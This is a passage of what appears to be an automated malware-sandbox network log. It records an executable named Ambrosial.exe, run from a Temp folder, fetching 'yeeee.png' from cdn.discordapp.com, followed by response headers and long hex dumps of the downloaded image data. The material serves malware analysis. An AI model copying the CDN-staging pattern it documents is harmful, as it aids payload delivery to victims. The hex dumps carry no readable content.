                                                                                                                                                                                      2021-10-30 11:52:10 UTC313INData Raw: de 46 55 ef d7 7b 94 4f 8c c8 91 d7 7b a0 cf 1c da c9 aa 38 3b a2 93 53 c2 b1 3b d8 8c 1c 5e 12 f2 fc 40 41 8e 93 20 ff 15 f2 f4 7f 88 73 36 17 7d 4a c0 7d 19 24 3f 71 1e 6f d5 b7 4e 69 0e f2 88 71 8c 47 7c da da 40 d9 47 65 da 24 e0 a5 ee 6a 67 3b 7d e0 9f 98 19 47 fe 0a 79 69 0f e0 67 3d 4b 7d a5 8d ba c7 a0 9c 5c 52 4f be bc 94 09 e2 18 57 e0 27 73 01 a9 97 63 94 40 ae 8c 3a b6 59 02 ea 49 c0 49 91 d0 06 50 a6 df d5 76 f5 9f 80 27 df 18 a9 e7 78 a5 0f eb c0 76 d6 cd c3 ed 0f d0 d7 26 eb c7 e0 67 13 a4 2e 3c ea fa cf fe 72 a0 c2 8e ba 79 28 5b c7 05 20 97 af 2e 50 0e da d7 fe 08 b8 b5 97 1c 52 5f a8 03 d0 a3 7d 51 0c b1 d6 a1 f4 45 89 bf 6c ab a3 7f 65 60 ad af be 24 91 ed b5 3c e6 1f e8 13 b2 9e ba 99 af 63 06 b4 49 d8 5e f7 f5 6c ab 43 a9 6f 28 f3 00
                                                                                                                                                                                      Data Ascii: FU{O{8;S;^@A s6}J}$?qoNiqG|@Ge$jg;}Gyig=K}\ROW'sc@:YIIPv'xv&g.<ry([ .PR_}QEle`$<cI^lCo(


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                      6192.168.2.349753162.159.133.233443C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                      2021-10-30 11:52:12 UTC316OUTGET /attachments/489891892142669842/844005578808360960/yeeee.png HTTP/1.1
                                                                                                                                                                                      Host: cdn.discordapp.com
                                                                                                                                                                                      2021-10-30 11:52:12 UTC316INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 30 Oct 2021 11:52:12 GMT
                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                      Content-Length: 117969
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      CF-Ray: 6a646fa3ec654eb6-FRA
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Age: 113691
                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                      ETag: "57b901d65f2725d394d569c05dd34fa4"
                                                                                                                                                                                      Expires: Sun, 30 Oct 2022 11:52:12 GMT
                                                                                                                                                                                      Last-Modified: Tue, 18 May 2021 00:16:50 GMT
                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                      x-goog-generation: 1621297010897343
                                                                                                                                                                                      x-goog-hash: crc32c=8ngaGQ==
                                                                                                                                                                                      x-goog-hash: md5=V7kB1l8nJdOU1WnAXdNPpA==
                                                                                                                                                                                      x-goog-metageneration: 1
                                                                                                                                                                                      x-goog-storage-class: STANDARD
                                                                                                                                                                                      x-goog-stored-content-encoding: identity
                                                                                                                                                                                      x-goog-stored-content-length: 117969
                                                                                                                                                                                      X-GUploader-UploadID: ADPycdsX4slFsYSJeRA6EI0jVRIm59FopZLgvJoW6XM86ZFw0D_4eAHny8EUeC3p7xVvhYZoCwPvPtkjhww7s9dXegs
                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7nK6jpVI7wuQirGhOsOPvlvmfv5cCfzHolCMNMeiuj4zcKZMhogvZbqR7nmDT%2FpC3XVOnALfkWaraBWUiTl3U0PIH9Zz0AlAnLvStTyfJWY2GUlDOU82piXOLZb66zuSOoSfRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                      2021-10-30 11:52:12 UTC317INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: Server: cloudflare
                                                                                                                                                                                      2021-10-30 11:52:12 UTC317INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 6a 00 00 00 bf 08 06 00 00 00 4e be f0 ca 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c2 00 00 0e c2 01 15 28 4a 80 00 00 ff a5 49 44 41 54 78 5e ac fd 7b cc 75 5b 96 d6 87 ed f7 7b bf cb b9 54 9d aa ae ea 7b 53 5c 1b 0c ed 06 37 dd 98 36 77 b7 c1 dc 62 05 48 22 30 98 a6 2f 60 08 b2 85 44 94 44 89 a2 84 8a 64 e5 9f e4 8f 44 f9 c3 4a 22 45 b1 1d e7 a2 24 8a 6c 29 02 d9 4a 14 2e 31 b6 51 07 83 02 6e 4c d3 40 43 43 bb e9 aa ae db 39 e7 bb 7f 79 7e cf 33 c6 9c 63 ad 77 7f e7 9c 2a 18 7b 8f f5 8c 31 e6 9c 63 5e d6 5c 73 8d 77 ae bd f7 7b f3 f2 c7 fe cd 57 37 af 5e 5c 2e 2f c4 2f e1 e7 c1 d6 49 7b f5 f2 22 45 fc ea 72 b9 11 df 93
                                                                                                                                                                                      Data Ascii: PNGIHDRjNsRGBgAMAapHYs(JIDATx^{u[{T{S\76wbH"0/`DDdDJ"E$l)J.1QnL@CC9y~3cw*{1c^\sw{W7^\.//I{"Er
                                                                                                                                                                                      2021-10-30 11:52:12 UTC319INData Raw: 0f 1f b8 d2 2d 93 1e 96 e9 0a f7 75 c8 88 e4 35 fb b1 d3 db 37 bc d3 cd a7 32 3b 5f 78 b6 eb d0 3f cb 23 df c8 b3 f3 ee f4 2e d3 9c 7c 5d ee cc c7 bc 32 65 0c 26 eb 00 36 65 d5 2c ae b9 39 a9 66 f5 e1 15 ab 8e a3 48 eb 1f 44 69 43 da 75 e6 6b 74 48 2b 61 e6 a5 2f 4d 11 d3 00 e4 03 eb d0 ab 22 0c 45 de 6d 81 96 3c 1c 6f e9 48 6b 2c ea ba 7f e9 3f 90 5f 1a 5f 2a b0 23 b8 7b f1 42 81 61 b3 ee 69 2d 3f d3 7d ed b9 ee 6f cd 2f 14 33 bd 90 ed 85 ee 75 70 62 1d b9 d6 62 dc f1 cf 2b dd 5f c3 2d 6f bc b7 82 af 0e ce 26 9e d9 79 d5 f0 46 55 1c 96 cc 0a 78 b8 e1 de 65 47 bd ab 51 85 c5 bd 91 b7 74 f9 4a fe a0 46 46 09 0a 3b d2 7a 0d 6e ef 83 25 14 39 72 6e 65 ca 98 11 5f 24 5f 7e 25 a5 59 1e 17 d3 85 de 5d f3 0e 5b d9 5a 56 33 cd 33 60 db 28 7f 65 97 58 3c e5 b3 9e
                                                                                                                                                                                      Data Ascii: -u572;_x?#.|]2e&6e,9fHDiCuktH+a/M"Em<oHk,?__*#{Bai-?}o/3upbb+_-o&yFUxeGQtJFF;zn%9rne_$_~%Y][ZV33`(eX<
                                                                                                                                                                                      2021-10-30 11:52:12 UTC320INData Raw: 03 a5 0e d2 9e cb 43 ef a4 f1 f9 34 07 6e ca bb 3e ab a6 d2 be b9 c1 50 c9 b6 4b 68 8e df f8 4a e0 17 99 5d 36 63 5a 5a f9 5a df e5 1d 9c 81 8e be 54 81 30 17 01 5c b2 93 32 51 c2 92 f5 e2 0d 61 6b 19 ca 4d 39 64 b1 0f bc 91 17 97 61 72 65 a2 6d 5a 3a e4 2c ed b3 5c 6d a5 02 07 69 25 47 97 ca c0 f9 dc 8b 57 a0 86 ae f3 8a ee 39 55 ec 59 ac 34 98 bf 24 c0 f6 27 4a fd 43 26 a9 6c 8d c7 71 14 57 bb e3 5a e3 bc fa d1 69 1d a8 c5 ee b1 97 6c e7 03 3d b6 83 f7 f9 a8 14 cb 35 1a 25 93 e2 c5 d6 f9 9d e0 b4 28 10 39 9c b1 68 a4 ed 2c 39 e4 1d 5a 42 51 e7 29 8e 0b 1d ba ae c5 95 05 32 96 6d 19 af 53 fc ed 5c e0 64 c8 3d a9 8c 6d fb aa c8 e7 fa 44 3e 67 4d 59 e8 22 e5 70 48 f3 b1 29 2d 68 db 2e a7 f3 bb e4 e8 4d 67 bd 0c e6 43 bd 20 b6 92 a1 4e 5f d6 02 bc 2d 96 2d
                                                                                                                                                                                      Data Ascii: C4n>PKhJ]6cZZZT0\2QakM9daremZ:,\mi%GW9UY4$'JC&lqWZil=5%(9h,9ZBQ)2mS\d=mD>gMY"pH)-h.MgC N_--
                                                                                                                                                                                      2021-10-30 11:52:12 UTC321INData Raw: fd 12 d6 55 60 db 3e 27 6d 03 39 b4 6e b5 84 3b 79 75 08 0e ee f4 ca 93 b9 5c 5c af 55 ef e0 43 be 0f e0 99 cf b2 ea b9 1b 78 c8 e6 3a 86 ad 74 e7 75 99 cd 4e ff 00 9e 79 5f c7 f9 ec 57 fc 9f 03 a4 fe 9c d8 62 9d 84 5d b6 6d 23 1d fb d4 97 1c fb e1 f3 67 4e 1b be ac 6f ee 3e b7 ac f7 66 46 22 ef 3a 4c 1a d7 cd b8 ce 66 e6 2e 3f 0b 23 1d af b8 af 86 28 77 bd ec 6b 3d 56 c2 6c e2 94 9b 7c 6f b0 70 2d 1d 4b ac e4 73 a0 a6 9b 0a 3b 65 79 ec f9 f2 f2 8c 20 8d 60 ad 82 34 07 6b 87 40 8d 7d 38 91 da c3 38 73 6e f8 86 7e 07 6b c8 7b 37 ad 1a 2d d8 01 59 82 b3 0e ca 5a 9e 21 53 48 93 c7 0a 3e da 0f 67 a2 f5 f6 9f fb 50 6c f7 14 a8 fd fe 7f 61 07 6a cf 08 d2 1a 65 53 c7 12 a8 c9 b3 3a 93 56 a9 1c 35 e3 60 55 d8 54 32 37 57 d2 60 f2 c3 ec 9e d4 67 d3 66 90 c6 0e 5a
                                                                                                                                                                                      Data Ascii: U`>'m9n;yu\\UCx:tuNy_Wb]m#gNo>fF":Lf.?#(wk=Vl|op-Ks;ey `4k@}88sn~k{7-YZ!SH>gPlajeS:V5`UT27W`gfZ
                                                                                                                                                                                      2021-10-30 11:52:12 UTC323INData Raw: 65 19 cc da df f7 74 36 62 96 6c d6 e8 82 bc 5e fe 5f 3e fb ca 5f 26 e8 00 6d 05 6a b2 65 eb 43 b9 3d 2c c1 fe 7e 35 c1 1a 7c 2d 50 f3 f7 8d c5 6a 98 6f 7a ba 19 7a b7 04 b7 cf 74 73 74 a0 96 2f 11 3c af 1f bc 35 23 2b 58 23 48 7b 55 41 da cd 33 dd 3e 15 a8 dd aa 5d fe 8c 1a 81 5a 05 67 1d a8 39 f4 d1 49 9a 37 45 b7 58 87 be 01 67 07 6d ef 9a 39 48 ab 00 6d 07 6b 09 de 12 a8 a9 2d 42 07 6a d5 f7 0e 7e 3a 50 0b ab 9b c2 0c a8 48 48 e8 b6 7e fc 16 f9 d5 fe c9 59 5a 19 44 27 af 4a b9 4c c9 b2 fb 0c 95 1d c6 77 e3 3c 91 be a1 17 6e ee c0 b1 da 27 af 09 d0 90 83 f9 31 5c b5 c2 79 82 1d ac b9 2f fc f0 2d 28 76 93 e4 a3 51 92 db 12 0d ec b6 d3 ee f4 2b 7d 28 84 09 d2 84 09 d0 90 41 65 b1 0e e2 25 08 91 7e 87 aa 4e e7 d4 3b 75 0b 4b a6 28 a8 59 13 76 00 06 e6 3c
                                                                                                                                                                                      Data Ascii: et6bl^_>_&mjeC=,~5|-Pjozztst/<5#+X#H{UA3>]Zg9I7EXgm9Hmk-Bj~:PHH~YZD'JLw<n'1\y/-(vQ+}(Ae%~N;uK(Yv<
                                                                                                                                                                                      2021-10-30 11:52:12 UTC324INData Raw: 97 66 79 e3 0a d4 74 3e aa a5 0e c8 4a 2a 99 ee f0 02 69 7b 64 c8 7d 8d 94 44 8b db 66 b7 60 c9 dd 96 cc 08 a1 0e c8 1d ac ad 40 4d f2 21 70 ab b4 c6 f8 a1 4e 2a 08 a6 2d c1 0f 0d a4 5c 3b 10 e4 e2 cf bb ed e5 5a 44 49 64 fb 3d f9 ef c0 6d d7 93 32 71 c3 41 1e f1 cb 22 65 b9 98 94 42 28 7d 89 af 46 7c e2 30 be 4b 17 35 3a 63 51 fb 69 3a eb 77 0d 83 b6 9b eb 54 65 5f 57 07 fd 33 d6 f1 a8 9f d3 4f 34 ea b6 b8 fa 16 8a cd e2 a2 93 7a 85 5e 93 63 99 23 9c aa 32 cd 2c 8c f9 a4 ce 7f cc b3 85 b6 1b 4b 69 5b a4 e3 40 18 d6 a0 48 c8 3b b4 84 8f 4e bb 2e 64 69 c3 30 d3 4c cb c0 bc 2a 11 b2 ac 43 db 66 9a c8 cd aa 76 ae f9 7b d2 0f e7 bb d2 ee d2 c9 f1 89 3e 38 f5 f5 74 b5 9c 8c b1 ef d4 bb e7 f2 74 b6 a5 1c f4 2b 74 27 bd c7 c3 62 24 8f 89 c4 73 90 b6 f5 ca 43 de
                                                                                                                                                                                      Data Ascii: fyt>J*i{d}Df`@M!pN*-\;ZDId=m2qA"eB(}F|0K5:cQi:wTe_W3O4z^c#2,Ki[@H;N.di0L*Cfv{>8tt+t'b$sC
                                                                                                                                                                                      2021-10-30 11:52:12 UTC325INData Raw: 83 1e 9b 60 82 9f 0e 74 c2 7a 6f ac 7c ae ed d0 28 30 f2 9e 8f 8d 77 e9 9c b2 8a 98 ee 96 eb 39 c7 31 ed 4b 9b 57 3b 65 78 21 84 fd bb 67 6d 1f ac b7 cb da 53 a1 fd 0e b9 39 3e c7 8e 9a 82 2f be 28 40 20 f6 9e 38 ff 98 9d c7 9f 0a d4 14 a4 21 1f 03 b5 e7 f2 c1 ea 9f 75 38 8f 3f 6f b3 93 e6 20 ac 83 b2 04 66 09 dc 7a a7 ad be 68 20 fd 5a b0 76 de 51 7b ed 67 d3 78 21 88 7c c4 0e bc f8 37 fe 04 bd d4 8d 54 0d f4 48 0a a5 eb 50 4c 5e a1 73 8b 3b 12 e8 cf a9 f9 ce 2f 63 cb 8e 12 c4 04 28 02 0a ed 40 4d fc 5c b2 02 b1 0e d6 08 cc fc 9f 08 08 d0 3a 48 e3 f3 72 a0 da d3 41 1a ed 23 38 4b 80 a6 db ae 9b 84 9c 36 42 d6 28 96 1c 0e d4 d6 4e 9a 83 b0 6b 81 5a 21 f6 ca 73 dc 51 1b 35 d0 35 c0 a8 da 86 4e 57 33 c0 a5 90 a3 f4 04 69 1b 8f 01 da 96 7d 4a da 19 9a e5 99
                                                                                                                                                                                      Data Ascii: `tzo|(0w91KW;ex!gmS9>/(@ 8!u8?o fzh ZvQ{gx!|7THPL^s;/c(@M\:HrA#8K6B(NkZ!sQ55NW3i}J
                                                                                                                                                                                      2021-10-30 11:52:12 UTC327INData Raw: e3 57 b7 b6 cf 40 ad 3f d3 d6 be f0 db fd f1 51 07 b7 05 6e 99 83 a4 80 2d c1 25 1f 83 33 dd 6e 87 5c 58 7a 5c b4 5c 69 31 5a af 2c c9 63 c4 ea 14 cb 9c 0a c6 c8 a7 49 4c 90 d6 a7 a9 03 b3 b3 9c 2f 14 c4 96 40 0d 3f 15 a4 95 dc 8f 3e 9b 7a dc b3 73 c6 a9 ca 78 f1 b8 33 48 ae a4 a7 75 3a 4a 36 ca 69 da 99 b6 ad 20 ad ed 42 eb e4 28 7b cb 65 40 38 c8 35 2b 56 90 46 da 6e 63 b7 b7 b8 74 4d 2f c9 ba d0 87 9c f4 42 71 1f 5d 3f 28 ff b4 39 6d a4 bd 85 a5 eb bd f2 86 52 de 95 4a 0e e0 5f 82 93 92 4e 09 73 95 6f 9f 1d a4 b5 7f a3 f3 1d 6b b1 ef 3a 76 fb bd 80 b5 cd d8 e4 4a a8 05 47 f1 35 fd 2e 7d e4 6b b2 38 f4 41 cb 7a 25 39 a6 53 42 a9 57 b2 9b 76 7b 8f 74 b0 a3 2c 07 c3 d3 c1 a9 94 bc 3f 94 9c e7 5a c5 d7 0a 6b 8c 0e 74 ae c3 4a 2c 43 0c 49 3e 8c eb 1d aa 46
                                                                                                                                                                                      Data Ascii: W@?Qn-%3n\Xz\\i1Z,cIL/@?>zsx3Hu:J6i B({e@85+VFnctM/Bq]?(9mRJ_Nsok:vJG5.}k8Az%9SBWv{t,?ZktJ,CI>F
                                                                                                                                                                                      2021-10-30 11:52:12 UTC328INData Raw: 55 c5 6b e8 b5 09 ab 1f 07 52 f6 f2 e8 e3 d5 e2 a3 32 ff 21 f8 55 93 47 e1 ba ef 0f a0 55 6d 17 7e 5d 79 37 49 07 f0 9a 3c e0 83 29 73 60 51 95 bf 6b 7b 8d bb 6e 67 43 77 40 c0 9c 88 8c 72 44 27 71 c8 85 b0 9f c0 b4 6c 73 30 99 45 dd 28 a1 ef 07 46 da 5a 28 5b eb 34 d6 b0 8b 1c 10 da 57 92 a8 12 56 ba 51 07 d0 50 32 74 ce 0b 4d b9 68 78 5f d4 5d b9 4a 67 87 56 07 1a 0a 4d 9d 76 a2 6e 9f 8f a8 6e 7d 65 27 50 d9 36 b2 22 05 43 c1 34 b4 6d ab 37 82 0f ea c2 4c 8b 3c 2d e5 ad ea ea 7a 13 3c 11 a0 dd 0d d2 fc bf 37 9b 15 54 ad e0 8d 20 4d 41 53 3f fe e4 c5 15 d7 b5 75 dd 41 52 75 24 1f f5 88 0f 5f 26 18 3b 6a 79 fc 29 ae dd 34 02 b5 c7 0a d4 f8 61 5c be 48 40 39 cf 2f 11 d3 94 2f 13 f0 d9 b4 04 5e 04 6b 23 48 7b 10 74 a0 66 3d d8 bb 69 e4 cb a3 cf fd 9b 6a 7e
                                                                                                                                                                                      Data Ascii: UkR2!UGUm~]y7I<)s`Qk{ngCw@rD'qls0E(FZ([4WVQP2tMhx_]JgVMvnn}e'P6"C4m7L<-z<7T MAS?uARu$_&;jy)4a\H@9//^k#H{tf=ij~
                                                                                                                                                                                      2021-10-30 11:52:12 UTC329INData Raw: 70 23 40 0b f3 e5 03 82 b4 7e ec a9 60 8d dd 34 f9 a5 1f bc 9b fa fc 78 cc 24 ad e0 56 13 be 1f ff de 7c e9 0f ff c1 15 7f 18 18 88 52 32 18 25 63 b7 0c 4e 39 e9 96 05 39 88 56 ed 91 51 d7 a2 d3 81 59 e9 96 17 eb 00 42 c6 52 0c 71 1e 4b 82 34 02 81 0e d2 1c a8 55 e0 d5 bb 69 fb 71 27 41 5a 07 68 09 dc 1c cc 15 13 a0 f5 8e 1c c8 a0 74 90 46 7d e8 5d 6f 48 d8 62 c9 1e 81 42 8f 91 15 e4 61 b3 62 6d c8 b8 28 1d cd ef 63 9a 2d 56 50 23 74 5a 52 73 88 cc 84 2e 59 87 5a 1f 97 7d 71 d9 a7 be 1f 7d c2 1d a8 ed 74 fc e9 5d 6d b1 84 60 cc 05 df 41 5a 8f 17 e7 a8 04 53 72 41 95 3b d8 fd d0 21 f5 d0 5f 26 f5 94 c1 ce 6b 61 95 85 1a 43 c9 7b 97 62 dc 4d e2 d2 ec 36 46 46 89 8d b9 69 69 a4 4b b0 1c ea 3a d2 26 c6 89 7a 8b f5 62 dc 5a 26 5d 62 95 2f 27 ae 2b 3e 8d 65 9b
                                                                                                                                                                                      Data Ascii: p#@~`4x$V|R2%cN99VQYBRqK4Uiq'AZhtF}]oHbBabm(c-VP#tZRs.YZ}q}t]m`AZSrA;!_&kaC{bM6FFiiK:&zbZ&]b/'+>e
                                                                                                                                                                                      2021-10-30 11:52:12 UTC331INData Raw: 6a 38 54 45 33 58 cb df 48 7a 55 75 5d 5b 0a 05 5d d4 08 f3 d7 6b ea de b6 e4 0d a2 5b 2d 3a 28 8b 96 f5 4e f2 b5 fc b2 5d 77 23 f3 6b 12 26 75 f1 ac 6e 57 68 8f ad e9 a4 42 2e 79 ad 78 8d db 1e c0 89 27 9b a9 85 6a 54 3b 9e be c9 5e 65 8c 2b 30 29 59 90 43 08 c9 63 6f 7f 03 a1 85 81 73 3b 86 9b 03 2d b3 cb e9 00 0e df 09 c0 da 26 9e ba e7 5c e9 d8 9d 16 7d 05 6e 7a 83 c0 3e a8 56 2a ae be a7 af 12 66 ff e7 e3 cf 4e 23 af 38 c5 7c 30 d9 5e 64 71 d9 67 9e 25 2c db 2a 28 58 2b 57 a7 89 dc dc a2 29 43 67 bd 29 f6 e9 ab 65 50 5c b6 fd 85 96 b6 41 4b 38 88 9b b6 f1 4e b2 0c d3 f6 3a f9 9c ef 4c e7 b4 d6 17 56 79 98 00 03 7d 05 68 b0 ce 53 02 0d a1 83 a7 3c f6 5c 81 da b3 bd ab c6 b7 33 b1 b3 13 96 6f 7e e6 a7 32 38 57 cc 2b 82 34 02 9e 04 6b ac 7d 3b e8 e1 7e
                                                                                                                                                                                      Data Ascii: j8TE3XHzUu][]k[-:(N]w#k&unWhB.yx'jT;^e+0)YCcos;-&\}nz>V*fN#8|0^dqg%,*(X+W)Cg)eP\AK8N:LVy}hS<\3o~28W+4k};~
                                                                                                                                                                                      2021-10-30 11:52:12 UTC332INData Raw: 86 40 83 8d cf 0e 36 14 9c 09 7b 37 2d 8f 3d 3b 50 eb 5d 35 76 bb 08 d6 fa f3 69 09 d2 78 64 f9 42 e8 1f 9f 95 8f d4 5c 9f 19 73 a0 96 60 ad ff 1d 93 77 d7 94 ee 35 2f 8d 73 59 82 bd ec d2 e5 b1 67 ff 3c 47 3f f6 fc 72 05 6b 09 d4 12 0c 39 50 d3 c9 24 f8 e3 f3 69 0e d4 14 98 bd ad 20 ad 03 b5 b7 c5 7b 37 8d cf a6 dd 5e 1e 11 d4 55 a0 76 5f ed 20 50 73 40 69 24 40 eb 5d b5 6a a7 18 ca 38 1e 83 34 3f f6 64 8c 34 0e 0e 66 dd 36 45 28 9f 77 a0 46 31 1d 7a c6 81 65 2b 9f 12 23 33 68 79 27 01 5c 59 96 4d a4 41 6b 84 5a b6 6a ec e0 2c e8 80 ab 90 c7 98 33 58 43 66 04 91 2d 2a 4f 64 f2 6d ce 63 cc 3c fa 24 10 eb 47 9d f9 02 c1 ed b2 77 90 96 ff 3e 70 6f 3d ea c4 07 3e db 7f 63 26 65 d9 94 05 19 32 d6 00 65 f0 35 02 1e 27 d8 da d2 7d 82 9c 3f 79 fd 72 d1 6b 68 81
                                                                                                                                                                                      Data Ascii: @6{7-=;P]5vixdB\s`w5/sYg<G?rk9P$i {7^Uv_ Ps@i$@]j84?d4f6E(wF1ze+#3hy'\YMAkZj,3XCf-*Odmc<$Gw>po=>c&e2e5'}?yrkh
                                                                                                                                                                                      2021-10-30 11:52:12 UTC333INData Raw: ac ed 20 4d 79 75 72 53 a6 03 35 e8 58 0f 13 33 be 5b 06 8f 79 b3 08 d1 bb 42 71 6e c6 43 76 52 6c ac 73 94 8d 9e e2 d1 27 42 db 66 12 a4 44 d1 32 6f 5b 97 05 2c ea d0 f2 e2 b2 ad 40 ec 60 a7 b7 d1 f7 7a 9c 1a 48 4f c0 b9 6d e9 5b a7 fb 98 74 2c 79 2f b2 3c 6c ce 5e 68 1f c6 29 0b d5 c8 0e 3c d0 5b 76 db d0 ef d8 4b 2f fb 51 de be 39 00 10 b6 3b c4 04 2d 8a 98 05 ab 51 47 27 f4 cd 33 37 8f 2d 27 e7 26 57 c9 8b 36 18 4b d6 a1 c7 94 83 51 fa 22 8b f1 1b a9 88 b2 c6 ed c7 be 7a 3c ba cf 63 1c 18 b4 2e b3 fd 55 9b f5 f2 fc 96 d2 b5 ad ba 20 7c 34 96 dc 7e a3 37 8e bc 4d a5 cc b5 a0 e9 60 ba 93 7e f0 72 87 8e fe 4a 11 ac 52 2b 5d 42 cb 07 2c a5 6d 93 ee d8 64 c0 66 d6 08 71 97 12 1b 1d 9c 49 26 58 93 dc 41 db 62 bd 43 08 6a 1d 0d 74 23 4b 76 ba ca 81 f8 41 00
                                                                                                                                                                                      Data Ascii: MyurS5X3[yBqnCvRls'BfD2o[,@`zHOm[t,y/<l^h)<[vK/Q9;-QG'37-'&W6KQ"z<c.U |4~7M`~rJR+]B,mdfqI&XAbCjt#KvA
                                                                                                                                                                                      2021-10-30 11:52:12 UTC335INData Raw: 34 8a 76 d1 f2 6b db 51 76 aa 20 59 e7 71 52 79 9c d0 95 34 1d f4 63 fe 49 f6 3d 1c 1c 03 35 1d c0 65 2b 61 e9 8d 2d 14 1d d2 33 1e 3e e8 e2 77 80 26 3e 04 68 ba 73 05 2b 50 d3 42 eb b4 0c 64 b5 89 43 0d cc 79 40 c8 56 79 b3 73 a4 b2 d4 05 52 0c f4 d8 4a d4 39 d5 64 11 27 30 9b 81 1a 73 dc b2 de 3e 09 83 70 d3 e4 ba ae d1 2c 82 1b eb 08 81 e5 b3 4f b0 d5 96 0b 75 70 b6 95 d7 96 4a 0b 0d b1 1a 46 9f ad d1 b8 c8 b3 ef 57 30 22 47 9b 86 9b 6d 6b 4a 5a d6 ba d2 7c 4e 6a 05 37 92 d6 4c 9e 2d df 45 a4 2d 9f 48 09 a4 cd fa 8f a4 84 bc 97 1c da f2 4c bb 56 cf d9 b6 f4 53 42 b9 5b 6d c9 38 c5 2f a6 9e 73 b6 16 22 58 d4 d1 53 51 92 03 09 a1 1f 6f ca 00 3b f0 42 36 26 10 7b 8a 3c 99 fc 25 27 40 a3 3c 98 47 7c fd 7b 67 7c 26 ad 1f 79 be 7c 05 12 a4 f5 a3 4f a6 34 3b
                                                                                                                                                                                      Data Ascii: 4vkQv YqRy4cI=5e+a-3>w&>hs+PBdCy@VysRJ9d'0s>p,OupJFW0"GmkJZ|Nj7L-E-HLVSB[m8/s"XSQo;B6&{<%'@<G|{g|&y|O4;
                                                                                                                                                                                      2021-10-30 11:52:12 UTC336INData Raw: b8 e4 aa e3 8c 88 25 14 b6 4a 86 25 8a fa dc 99 ba 4d 6d ea 31 19 72 b2 6c 79 61 c9 d0 96 95 0f 68 92 72 58 f3 24 4f ec f4 d8 c2 d0 01 4b 09 74 ca 94 8e 74 ae bf 75 b7 6c e8 91 4b 5b 46 28 ca f4 df f2 35 db b9 21 6b 4c ca 3f 98 29 19 99 83 e7 9a d3 9c 50 f9 9d db c8 5a d6 41 5a 1e 75 76 40 76 d1 3d 3a c1 18 b2 51 fa 0c da b2 a3 a6 cb c2 18 3f c8 1d a8 85 47 a0 e6 6f 7a aa 46 05 14 0e d4 7c b7 a5 5b 15 a8 39 38 4b 70 94 0f f0 df f7 4f 63 3c d2 22 07 27 58 d3 e5 40 59 05 3b 2f 09 be 78 74 e8 47 9f 7c 71 e0 b1 bf 44 c0 63 4f 82 b4 2f 3c 79 ff f2 25 1e 87 56 a0 f6 54 e5 08 4a 89 19 6e fd e8 53 fe fd b8 f3 d1 e5 ed 47 6f fa 0b 05 6f ae 40 6d ec a8 29 2f ed 73 a0 a6 f2 7d 7f af 88 a3 e4 9c 9e be 16 18 df fe 81 db 73 a0 c6 a3 4e be 40 c0 17 20 f8 41 60 7f 46 ed
                                                                                                                                                                                      Data Ascii: %J%Mm1rlyahrX$OKttulK[F(5!kL?)PZAZuv@v=:Q?GozF|[98KpOc<"'X@Y;/xtG|qDcO/<y%VTJnSGoo@m)/s}sN@ A`F
                                                                                                                                                                                      2021-10-30 11:52:12 UTC337INData Raw: 85 1d 25 02 35 07 69 7c 26 0d 4e dd 0e d4 84 b4 8b b5 fa 96 cf a1 75 90 76 ab 00 c9 41 da fd cb 1b a0 d2 de d0 75 f0 46 05 6a 7c a1 80 40 ed 55 05 6a bd a3 c6 97 09 78 f4 e9 40 ed c9 fb 97 cf 3b 50 e3 9b 9f cf 2e ef f3 03 b3 2a 43 a0 c6 f5 76 af be 4c f0 c8 81 da a3 cb c7 1e bd b9 1e 7d c2 04 70 3c fa 64 57 2d 5f 6a b8 a7 4b 52 e5 d4 e2 7d 9e 8e 73 8b be 78 ee ab 5b 1e 57 fa cf 38 10 a8 79 8c 12 a8 e5 5b 9f 09 d4 d6 8e da 93 1f fa fe 0a fb 54 da 5e 85 53 97 bc 77 d4 0a 05 ea 8e 2b b4 ec 31 55 73 84 b6 39 58 53 61 67 89 dc bc 03 b5 04 61 3b 50 0b f6 8e 1a c1 5a 7f 0b 34 81 5a 36 12 bd 68 71 13 e6 25 19 e6 46 ec 7f 25 d1 fa b0 2d bd d8 5d 34 46 86 e8 03 4d d7 58 b9 6d 2b 38 6b 56 5a 30 c1 da e1 7f 81 4a 86 56 5b ee 30 43 58 88 ae bc 66 e9 94 3c b2 9c 97 dc
                                                                                                                                                                                      Data Ascii: %5i|&NuvAuFj|@Ujx@;P.*CvL}p<dW-_jKR}sx[W8y[T^Sw+1Us9XSaga;PZ4Z6hq%F%-]4FMXm+8kVZ0JV[0CXf<
